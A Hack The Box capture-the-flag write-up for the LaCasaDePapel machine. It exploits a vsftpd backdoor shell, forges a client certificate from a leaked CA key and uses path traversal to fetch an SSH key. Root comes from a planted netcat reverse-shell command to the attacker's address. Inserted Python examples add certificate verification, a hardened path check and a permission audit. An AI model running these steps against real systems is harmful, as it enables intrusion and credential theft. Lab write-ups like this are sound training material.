# Hack The Box - LaCasaDePapel

## Quick Summary

Hey guys, today LaCasaDePapel retired and here's my write-up about it. It was an easy, interesting box, more of a CTF challenge than a realistic scenario, but I still enjoyed it. It's a Linux box and its IP is 10.10.10.131; I added it to /etc/hosts as lacasadepapel.htb. Let's jump right in!

## Nmap

As always we will start with nmap to scan for open ports and services:

```shell
nmap -sV -sT -sC lacasadepapel.htb
```

We have HTTP on port 80, HTTPS on port 443, FTP on port 21 and SSH on port 22.
Anonymous authentication wasn't allowed on FTP, so I checked HTTP and HTTPS:

## HTTP

http://lacasadepapel.htb

We see an image of the characters from LaCasaDePapel (the TV show) and a QR code for OTP; I scanned it with Google Authenticator on my phone:

As you can see, I had to refresh it manually while other tokens refreshed automatically. No idea why, but anyway I took the OTP and used test@test.com as the email:

Then nothing happened; I just got the same page back again. I tried gobuster to see if I could find any subdirectories and didn't get anything useful. Let's check HTTPS.
https://lacasadepapel.htb

The same background, with an error message saying: "Sorry, but you need to provide a client certificate to continue."

## vsftpd 2.3.4, Psy Shell

After hitting dead ends with the web services, I checked the FTP service again. The version was vsftpd 2.3.4 (from the nmap scan), so I searched for exploits:

The search turned up a command execution exploit, and there is a Metasploit module for it, but the exploit didn't work:

Apparently there was another service running on port 6200; a quick nmap scan shows that the port is open:

So I connected to that port with nc to see what's there:

The banner says Psy Shell v0.9.9. I didn't know what Psy Shell was, but a quick search found the website: it's a shell used for interactive PHP debugging, and we can use it to execute PHP.
I tried to execute system commands, but I couldn't:

I tried scandir() to see the current directory listing, and it worked:

I could list the directories in /home:

Now we know the users on the box: berlin, dali, nairobi, oslo and professor.
I found the user flag in /home/berlin; however, I got permission denied when I tried to read it:

Same for .ssh. After a lot of failed attempts to get RCE, I looked at the help menu to see if there was anything helpful:

I used ls to see what variables were there:

There was only one variable, called tokyo. Let's check that variable:

The function sign() uses the private key /home/nairobi/ca.key. We can grab that key and create a client certificate to access the HTTPS service we couldn't access before.

## Client Certificate Generation

First, we will create a certificate signing request (CSR):

Then we will use it to generate the certificate:

And finally we will create a PKCS12 certificate:

Now we can import it into Firefox:

We have to remove the SSL exception we added earlier for https://lacasadepapel.htb; then, when we visit it again, it will request our client certificate:
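The three openssl steps above (CSR, signing, PKCS12 export) only survive as screenshots in the write-up. As an added example that is my own code, not the author's, the script below drives the same sequence through the openssl CLI from Python and then checks the result with `openssl verify` and a PKCS12 read-back. To stay self-contained it generates a throwaway CA; the `/CN=` subjects, file names and the `changeit` passphrase are all my own choices. On the box the signing key would be the one read from /home/nairobi/ca.key, and the issued certificate's issuer name has to match the CA certificate the web server trusts. This is also the defender's takeaway: anyone who can read the CA key can issue a certificate the server accepts, so that key belongs in a file only root can read.

```python
"""Added example (not from the write-up): issue a client certificate with the
openssl CLI and verify it, mirroring the CSR -> sign -> PKCS12 steps above.
All names, subjects and the passphrase are constructed for this demo."""
import os
import shutil
import subprocess
import tempfile
from typing import Optional


def openssl(*args: str, cwd: str) -> subprocess.CompletedProcess:
    """Run one openssl command in cwd, raising on a non-zero exit status."""
    return subprocess.run(["openssl", *args], cwd=cwd, check=True,
                          capture_output=True, text=True)


def issue_client_cert(workdir: str, cn: str = "client",
                      passphrase: str = "changeit") -> dict:
    """Create a throwaway CA, then a client key/CSR, sign the CSR with the CA
    key, export the result as PKCS#12 and verify the chain. Returns file paths
    plus the verification outcome."""
    # Throwaway CA. On the box this key was read from /home/nairobi/ca.key and
    # the server already trusted the matching CA certificate; here we make both.
    openssl("genrsa", "-out", "ca.key", "2048", cwd=workdir)
    openssl("req", "-new", "-x509", "-key", "ca.key", "-days", "1",
            "-subj", "/CN=Demo CA", "-out", "ca.crt", cwd=workdir)

    # Step 1: client key and certificate signing request (CSR).
    openssl("genrsa", "-out", "client.key", "2048", cwd=workdir)
    openssl("req", "-new", "-key", "client.key", "-subj", f"/CN={cn}",
            "-out", "client.csr", cwd=workdir)

    # Step 2: sign the CSR with the CA key; the issuer becomes ca.crt's subject,
    # which is what the server matches against its trusted CA.
    openssl("x509", "-req", "-in", "client.csr", "-CA", "ca.crt",
            "-CAkey", "ca.key", "-CAcreateserial", "-days", "1",
            "-out", "client.crt", cwd=workdir)

    # Step 3: bundle certificate and key as PKCS#12 for import into a browser.
    openssl("pkcs12", "-export", "-in", "client.crt", "-inkey", "client.key",
            "-out", "client.p12", "-passout", f"pass:{passphrase}", cwd=workdir)

    # Check: the client certificate chains to the CA, and the bundle opens.
    verify = subprocess.run(["openssl", "verify", "-CAfile", "ca.crt", "client.crt"],
                            cwd=workdir, capture_output=True, text=True)
    readback = subprocess.run(["openssl", "pkcs12", "-in", "client.p12", "-noout",
                               "-passin", f"pass:{passphrase}"],
                              cwd=workdir, capture_output=True, text=True)
    return {
        "verified": verify.returncode == 0 and readback.returncode == 0,
        "verify_output": verify.stdout.strip(),
        "p12": os.path.join(workdir, "client.p12"),
    }


def demo() -> Optional[bool]:
    """Run the flow in a temp dir. None when the openssl CLI is not installed."""
    if shutil.which("openssl") is None:
        return None
    with tempfile.TemporaryDirectory() as d:
        return issue_client_cert(d)["verified"]


if __name__ == "__main__":
    print("client certificate verified against CA:", demo())
```

The resulting client.p12 is what a browser import dialog expects; `openssl verify` is the quick way to confirm, before touching the browser, that the certificate really chains to the CA the server trusts.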

After gaining access we have the option to choose season 1 or season 2; clicking on one of them takes us to a page to download episodes:

As you can see in the URL, there is a GET parameter called path, which means that the PHP script reads files from a given path and lists them (in this case the directory SEASON-1). If that parameter isn't filtered correctly, it can cause a path traversal vulnerability allowing us to list files in other directories. However, listing files doesn't help us in any way; we can already do that with Psy Shell. But if we try to download an episode, 01.avi for example:

Decoding that base64 string we get this:

It uses the path to request files. Let's see where we are first:
https://lacasadepapel/?path=../

We are in berlin's home directory (because the user flag is there).
https://lacasadepapel/?path=../.ssh/

Let's download id_rsa; we know that the path is ../.ssh/id_rsa:

The -n flag here suppresses the trailing newline, so it doesn't end up inside the base64-encoded path.
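The download endpoint accepts a base64-encoded relative path and opens it as given, which is why `../.ssh/id_rsa` works. As an added example (my own code, not the box's PHP), here is a minimal Python version of such a handler in its vulnerable form next to a hardened one that canonicalises the decoded path and refuses anything resolving outside the served directory. The file tree (berlin/downloads/SEASON-1/01.avi beside berlin/.ssh/id_rsa) and its contents are constructed in a temp dir for the demo.

```python
"""Added example (not the box's code): a base64 'path' download parameter,
handled unsafely and then safely. The file tree is constructed for the demo."""
import base64
import binascii
import os
import tempfile

# Constructed tree: the served directory sits one level below berlin's home,
# so "../.ssh/id_rsa" from the served root lands on the key, as in the box.
ROOT = tempfile.mkdtemp(prefix="lacasa-demo-")
SERVED = os.path.join(ROOT, "berlin", "downloads")
os.makedirs(os.path.join(SERVED, "SEASON-1"))
os.makedirs(os.path.join(ROOT, "berlin", ".ssh"))
with open(os.path.join(SERVED, "SEASON-1", "01.avi"), "wb") as f:
    f.write(b"fake episode data")
with open(os.path.join(ROOT, "berlin", ".ssh", "id_rsa"), "wb") as f:
    f.write(b"fake private key")


def encode_path(path: str) -> str:
    """What the download link carries: base64 of the relative path (no newline)."""
    return base64.b64encode(path.encode()).decode()


def vulnerable_download(encoded: str) -> bytes:
    """Decodes the parameter and opens whatever it names, relative to SERVED.
    Nothing stops '..' segments, so any file the web user can read is served."""
    rel = base64.b64decode(encoded).decode()
    with open(os.path.join(SERVED, rel), "rb") as f:
        return f.read()


def resolve_inside_served(encoded: str):
    """Return the canonical absolute path if it stays inside SERVED, else None."""
    try:
        rel = base64.b64decode(encoded, validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None
    # realpath collapses '..' and follows symlinks, so a link planted inside the
    # served tree that points outside is caught too. An absolute 'rel' makes
    # os.path.join discard SERVED, which the prefix check then rejects.
    full = os.path.realpath(os.path.join(SERVED, rel))
    root = os.path.realpath(SERVED)
    if os.path.commonpath([root, full]) != root:
        return None
    return full


def hardened_download(encoded: str) -> bytes:
    """Only serves regular files that resolve inside SERVED."""
    full = resolve_inside_served(encoded)
    if full is None or not os.path.isfile(full):
        raise PermissionError("path rejected")
    with open(full, "rb") as f:
        return f.read()


if __name__ == "__main__":
    print(vulnerable_download(encode_path("../.ssh/id_rsa")))   # the key leaks
    print(resolve_inside_served(encode_path("../.ssh/id_rsa")))  # None
```

The check compares canonical paths rather than looking for the literal string `..`, so encoded variants, absolute paths and symlinks are all handled by the same two lines; a string-based blacklist would miss at least one of them.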

We found the key in berlin's home directory; however, I couldn't get SSH access as berlin. I tried other users, and professor worked:

I couldn't read the flag as professor, so I downloaded it the same way I downloaded the SSH key:

We owned user.

## Privilege Escalation, Root Flag

In the home directory of professor there are 2 interesting files: memcached.ini and memcached.js:

We can't read memcached.js, but we can read memcached.ini; we can't write to either.

memcached.ini runs the command `/usr/bin/node /home/professor/memcached.js` as nobody via sudo. Whatever processes that file is most likely running as root; I ran pspy and saw that the command gets executed periodically:

The UID is 65534, which is the UID of nobody:

We can't write to memcached.ini, but we can delete it and create a new one (deleting and creating a file needs write permission on the directory, not on the file itself):

I changed the command from `sudo -u nobody /usr/bin/node /home/professor/memcached.js` to `/usr/bin/nc 10.10.xx.xx 1337 -e /bin/bash`. After some seconds I got a reverse shell as root:
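The root cause here is not a writable memcached.ini but a writable /home/professor: unlink and create are directory operations, so a file that a root job reads can be swapped out by the directory's owner regardless of the file's own mode bits. As an added example (my own code, not from the write-up), the audit below reproduces that check from the stat bits alone, so it gives the same answer whichever user runs it, and also honours the sticky bit, which is the usual fix for shared directories. The file layout (a read-only ini file inside a user-owned directory) is constructed in a temp dir; the function and variable names are mine.

```python
"""Added example (not from the write-up): flag files that a privileged job
executes or reads but that an unprivileged user could delete and recreate
because the containing directory is writable. Layout is constructed for demo."""
import os
import stat
import tempfile
from typing import Iterable


def _bits_allow(st: os.stat_result, uid: int, gids: Iterable[int],
                owner: int, group: int, other: int) -> bool:
    """Classic Unix check: owner bits if uid matches, else group, else other.
    Root bypasses these bits in the kernel; the audit is about non-root uids."""
    if st.st_uid == uid:
        return bool(st.st_mode & owner)
    if st.st_gid in set(gids):
        return bool(st.st_mode & group)
    return bool(st.st_mode & other)


def can_write_file(path: str, uid: int, gids: Iterable[int]) -> bool:
    """Direct write: the only thing 'ls -l' on the file itself tells you."""
    return _bits_allow(os.stat(path), uid, gids,
                       stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)


def can_replace_file(path: str, uid: int, gids: Iterable[int]) -> bool:
    """Can uid unlink the file and create a new one in its place? Needs write
    and search on the parent directory; with the sticky bit set, the uid must
    also own either the file or the directory."""
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    f = os.stat(path)
    writable = _bits_allow(parent, uid, gids,
                           stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)
    searchable = _bits_allow(parent, uid, gids,
                             stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH)
    if not (writable and searchable):
        return False
    if parent.st_mode & stat.S_ISVTX and uid not in (f.st_uid, parent.st_uid):
        return False
    return True


def audit(path: str, uid: int, gids: Iterable[int]) -> dict:
    """Report whether the given uid could tamper with a privileged job's file."""
    direct = can_write_file(path, uid, gids)
    replace = can_replace_file(path, uid, gids)
    return {"direct_write": direct, "replace": replace,
            "finding": direct or replace}


def demo() -> dict:
    """memcached.ini-style layout: a read-only file inside a directory that is
    owned, and therefore writable, by the unprivileged user."""
    d = tempfile.mkdtemp(prefix="professor-")
    os.chmod(d, 0o755)                      # drwxr-xr-x, owned by us
    ini = os.path.join(d, "memcached.ini")
    with open(ini, "w") as f:
        f.write("placeholder\n")            # constructed content
    os.chmod(ini, 0o444)                    # -r--r--r--, no write bit for anyone
    me, my_gids = os.getuid(), {os.getgid()}
    other, other_gids = me + 1, set()       # some unrelated, non-root uid
    return {"owner": audit(ini, me, my_gids),
            "other": audit(ini, other, other_gids)}


if __name__ == "__main__":
    for who, result in demo().items():
        print(who, result)
```

Run across every path referenced by root's crontab, sudoers and systemd units, the `replace` column is the one that catches this class of bug; `direct_write` alone would have reported memcached.ini as safe.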

And we owned root!
That's it, feedback is appreciated!